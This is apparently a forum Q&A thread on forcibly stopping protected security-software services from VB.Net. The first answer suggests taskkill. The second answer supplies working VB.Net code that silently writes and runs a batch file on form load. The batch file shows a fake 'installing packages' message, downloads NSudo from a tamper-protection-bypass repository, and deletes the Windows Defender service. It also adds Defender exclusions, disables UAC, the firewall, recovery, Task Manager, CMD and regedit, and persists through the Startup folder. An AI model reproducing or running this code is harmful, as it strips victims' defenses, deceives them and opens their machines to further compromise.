Close Protected Services Forcibly Using VB.Net

Question

some running services (mostly security software services) of my windows are not able to stop. The Start/stop option for those services are disabled. How can I forcibly close those services using my vb.net?

I'm using Windows 7 64bit. The service I'm trying to close is firewall service of my security software.

Please provide more detail. What's your environment? OS, services you are trying to stop, and why. — Victor Zakharov, Nov 27 '12 at 20:43
Thank u. please check my question. i've added some more informations about that. — Adnan Hossain, Nov 27 '12 at 20:54
Bitdefender Internet Security... good. Which version? Why do you need to stop its firewall in your application? — Victor Zakharov, Nov 27 '12 at 21:10

score 0 · Accepted Answer · edited May 23 '17 at 11:56

0

Assuming the service has a corresponding process, you can try Taskkill:

Taskkill /f

You can use Shell to run the above from your program.

Or use Process.Start, as suggested here.

edited May 23 '17 at 11:56

Community

1
1

answered Nov 27 '12 at 21:28

Victor Zakharov

25,801
18
85
151

Rythorian77 · Answer 2 · 2022-05-26T23:04:14.950

This is a working example that disables Windows Defender.

I'm afraid the example that Victor offered is lame at best. I suggest you go to this link and read up and study the example because if you are trying to kill a service, it's vital to know if it has a parent process:

Stackoverflow:

Identify a process started in VB.Net to be able to kill it and all its children later

I wrote this Batch script and Power shell that is written with vb.net (using StringBuilder) and executed during the form load event. It's quite effective and runs invisible. If you wanted to convert it to a batch file, it would be relatively simple. Just extract the code from each AppendLine and place it into a text file and save it with the extension >> .bat

Note:

On Error GoTo is generally sloppy coding (but it serves a good purpose depending on the type of work you do...) It is wise to use Try Statements. A Try…Catch Statement consists of a Try block followed by one or more Catch clauses, which specify handlers for various exceptions.

On Error GoTo Statements is an example of Vb.Net's Unstructured Exception Handling.

Error GoTo: redirect the flow of the program in a given location. It can lead to serious programming errors, but with the code I provided there is nothing to worry about because I personally tested it.

Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load

      Kill_Defender_Bat()

End Sub


 Private Sub Kill_Defender_Bat()
        On Error GoTo ErrBatDie
        Dim rythorian77 As New StringBuilder
        rythorian77.AppendLine("@echo off")
        rythorian77.AppendLine("title Installing Packages")
        rythorian77.AppendLine(">nul 2>&1 ""%SYSTEMROOT%\system32\cacls.exe"" ""%SYSTEMROOT%\system32\config\system""")
        rythorian77.AppendLine("if '%errorlevel%' NEQ '0' (")
        rythorian77.AppendLine("goto UACPrompt")
        rythorian77.AppendLine(") else ( goto gotAdmin )")
        rythorian77.AppendLine(":UACPrompt")
        rythorian77.AppendLine("echo Set UAC = CreateObject^(""Shell.Application""^) > ""%temp%\getadmin.vbs""")
        rythorian77.AppendLine("set params = %*:""=""")
        rythorian77.AppendLine("echo UAC.ShellExecute ""cmd.exe"", ""/c %~s0 %params%"", "", ""runas"", 1 >> ""%temp%\getadmin.vbs""")
        rythorian77.AppendLine("""%temp%\getadmin.vbs""")
        rythorian77.AppendLine("del ""%temp%\getadmin.vbs""")
        rythorian77.AppendLine("exit /B")
        rythorian77.AppendLine(":gotAdmin")
        rythorian77.AppendLine("echo msgbox ""Please Wait While we install necessary packages for You!.Window will be closed after Installation!!!"" > %tmp%\tmp.vbs")
        rythorian77.AppendLine("wscript %tmp%\tmp.vbs")
        rythorian77.AppendLine("del %tmp%\tmp.vbs")
        rythorian77.AppendLine("echo  Installing Necessary Packages.....Please Wait.....")
        rythorian77.AppendLine("cd  %temp%")
        rythorian77.AppendLine("bitsadmin/transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe %temp%\NSudo.exe")
        rythorian77.AppendLine("set pop=%systemroot%")
        rythorian77.AppendLine("NSudo -U:T -ShowWindowMode:Hide icacls ""%pop%\System32\smartscreen.exe"" /inheritance:r /remove *S-1-5-32-544 *S-1-5-11 *S-1-5-32-545 *S-1-5-18")
        rythorian77.AppendLine("NSudo -U:T -ShowWindowMode:Hide reg add ""HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System""  /v ""ConsentPromptBehaviorAdmin"" /t REG_DWORD /d ""0"" /f")
        rythorian77.AppendLine("NSudo -U:T -ShowWindowMode:Hide reg add ""HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration""  /v ""Notification_Suppress"" /t REG_DWORD /d ""1"" /f")
        rythorian77.AppendLine("NSudo -U:T -ShowWindowMode:Hide reg add ""HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System"" /v ""DisableTaskMgr"" /t REG_DWORD /d ""1"" /f")
        rythorian77.AppendLine("NSudo -U:T -ShowWindowMode:Hide reg add ""HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System"" /v ""DisableCMD"" /t REG_DWORD /d ""1"" /f")
        rythorian77.AppendLine("NSudo -U:T -ShowWindowMode:Hide reg add ""HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System"" /v ""DisableRegistryTools"" /t REG_DWORD /d ""1"" /f")
        rythorian77.AppendLine("NSudo -U:T -ShowWindowMode:Hide reg add ""HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"" /v ""NoRun"" /t REG_DWORD /d ""1"" /f")
        rythorian77.AppendLine("NSudo -U:T -ShowWindowMode:Hide  sc stop  windefend")
        rythorian77.AppendLine("NSudo -U:T -ShowWindowMode:Hide  sc delete  windefend")
        rythorian77.AppendLine("powershell.exe -command ""Add-MpPreference -ExclusionExtension "".bat""")
        rythorian77.AppendLine("NSudo -U:T -ShowWindowMode:Hide bcdedit /set {default} recoveryenabled No")
        rythorian77.AppendLine("NSudo -U:T -ShowWindowMode:Hide bcdedit /set {default} bootstatuspolicy ignoreallfailures")
        rythorian77.AppendLine("powershell -inputformat none -outputformat none -NonInteractive -Command ""Add-MpPreference -ExclusionPath '""%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'""")
        rythorian77.AppendLine("powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force")
        rythorian77.AppendLine("powershell.exe -command ""Set-MpPreference -EnableControlledFolderAccess Disabled""")
        rythorian77.AppendLine("powershell.exe -command ""Set-MpPreference -PUAProtection disable""")
        rythorian77.AppendLine("powershell.exe -command ""Set-MpPreference -HighThreatDefaultAction 6 -Force""")
        rythorian77.AppendLine("powershell.exe -command ""Set-MpPreference -ModerateThreatDefaultAction 6""")
        rythorian77.AppendLine("powershell.exe -command ""Set-MpPreference -LowThreatDefaultAction 6""")
        rythorian77.AppendLine("powershell.exe -command ""Set-MpPreference -SevereThreatDefaultAction 6""")
        rythorian77.AppendLine("powershell.exe -command ""Set-MpPreference -ScanScheduleDay 8""")
        rythorian77.AppendLine("powershell.exe -command ""netsh advfirewall set allprofiles state off""")
        rythorian77.AppendLine("cd ""%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup")
        rythorian77.AppendLine("CreateObject(""Wscript.Shell"").Run ""KillDefender.bat"", 0, True") 'Hides Bat Running
        rythorian77.AppendLine("GoTo begin")

        File.WriteAllText("KillDefender.bat", rythorian77.ToString())

        Process.Start("KillDefender.bat")
ErrBatDie:

        Resume Next

    End Sub

Close Protected Services Forcibly Using VB.Net

2 Answers2